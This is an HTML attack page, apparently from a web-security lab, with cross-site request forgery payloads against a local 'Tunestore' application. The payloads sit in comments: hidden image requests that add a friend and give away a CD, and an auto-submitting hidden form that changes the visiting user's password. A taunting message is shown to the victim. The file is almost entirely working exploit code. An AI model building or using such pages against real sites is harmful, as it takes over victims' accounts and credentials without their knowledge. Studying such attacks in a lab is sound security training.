<!DOCTYPE html>
<html>
    <head>
        <title>Attack Page!!</title>
    </head>
    <body>  
    	<!-- ADD FRIEND CSRF (HTTP GET)
        <img src="http://localhost:8080/Tunestore/addfriend.do?friend=sam" width="1" height="1" /> -->        
        <!--  
        GIVE GIFT CSRF (HTTP GET)       
        <img src="http://localhost:8080/Tunestore/give.do?cd=6&friend=sam" width="1" height="1" /> -->        
        <!-- 
        CHANGE PASSWORD CSRF (HTTP POST)      
        <form name="CSRF" method="post" action="http://localhost:8080/Tunestore/password.do">
        	<input type='hidden' name='password' value="jake">
        	<input type='hidden' name='rptpass' value="jake">
        </form>
        <script>document.CSRF.submit()</script> -->
        <p>You just got hacked, kiddo.</p>        
    </body>
</html>